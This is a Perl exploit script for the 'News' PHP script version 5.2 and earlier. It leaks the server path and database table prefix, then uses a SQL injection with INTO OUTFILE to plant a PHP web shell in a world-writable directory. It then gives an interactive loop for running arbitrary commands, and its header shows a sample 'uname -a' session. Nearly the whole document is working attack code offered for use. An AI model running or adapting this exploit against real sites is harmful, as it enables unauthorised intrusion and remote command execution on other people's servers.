#!/usr/bin/perl #
# VulnScr: News version 5.2 and prior # E-mail: [EMAIL PROTECTED] # Web: www.vincent-leclercq.com # # Date: Thu June 29 12:01 2006 # Credits: DarkFig ([EMAIL PROTECTED]) # Vuln: XSS, Full Path Disclosure, SQL Injection # Advisorie: http://www.acid-root.new.fr/advisories/news52.txt (french =)) # Exploit: Create a php file (system($cmd)) in a dir ((smileys)chmoded 777 during the installation of the script) # # # +-----------------------------------------+ # | News <= 5.2 SQL Injection (cmd exec) ---| # +-----------------------------------------+ # [+]Full path: OK [/home/www/victim/news52] # [+]Prefix: OK [news_] # [+]File exist: OK # [localhost]uname -a # Linux ws6 2.6.16-SE-k8 #6 SMP PREEMPT Thu May 11 18:19:55 UTC 2006 i686 GNU/Linux # [localhost]exit # +-----------------------------------------+ # use LWP::UserAgent; use LWP::Simple; use Getopt::Long; # # Argvs # header(); if(!$ARGV[1]){ &usageis; } GetOptions( 'host=s' => \$host, 'path=s' => \$path, ); if($host =~ /http:\/\/(.*)/){ $host = $1; } # # Vars # my $helurl = 'http://'.$host.$path; my $uagent = 'Perlnamigator'; my $timeut = '30'; my $errr00 = "[-]Can't connect to the host\n"; my $errr01 = "[-]Can't get the full path of the website\n"; my $errr02 = "[-]Can't get the table prefix\n"; my $errr03 = "[-]The php file doesn't exist\n"; # # Client # my $client = LWP::UserAgent->new(); $client->agent($uagent); $client->timeout($timeut); # # First step: Determine the installation path. # $req1 = $client->post($helurl.'index.php', Content => ['mail[]' => '[EMAIL PROTECTED]', 'submit' => 'S%27inscrire'],) or print $errr00 and the_end(); if($req1->as_string =~ /in <b>(.*?)\/configuration\/head.php<\/b>/) { $fullpath = $1; print "[+]Full path: OK [$fullpath]\n"; $fullpath .= "/admin/smileys/hello.php"; } else { print $errr01; the_end(); } # # Second step: Determine the table prefix. # $req2 = $client->get($helurl.'divers.php?action=XXX&id=%27ERROR'); if($req2->as_string =~ /SELECT id FROM (.*?) WHERE/) { $prefixe = $1; print "[+]Prefix: OK [$prefixe]\n"; } else { print $errr02; the_end(); } # # Third step: Create a php file (system($cmd)) # $inject = "%27%20UNION%20SELECT%20%27%3C?%20system(\$cmd);%20?%3E%27%20FROM%20".$prefixe."%20INTO%20OUTFILE%20%27".$fullpath."%27%23"; $req3 = $client->get($helurl.'divers.php?action=XXX&id='.$inject) or print $errr00 and the_end(); # # Fourth step: file_exists()? yes ! enjoy =) # $req4 = get($helurl.'admin/smileys/hello.php') or print $errr03 and the_end(); print "[+]File exist: OK\n"; &commandexec; # # Subroutines # sub commandexec { while(1 ne 2) { print "[$host]"; chomp($cmd = <STDIN>); if($cmd eq "exit"){ &the_end; } $req5 = get($helurl.'admin/smileys/hello.php?cmd='.$cmd) or print $errr00 and the_end(); print $req5, "\n"; }} sub usageis { print "| Usage: -host localhost -path /news/ ---| \n"; &the_end; } sub the_end { print "+-----------------------------------------+\n"; exit; } sub header { print "\n+-----------------------------------------+\n"; print "| News <= 5.2 SQL Injection (cmd exec) ---|\n"; print "+-----------------------------------------+\n"; }
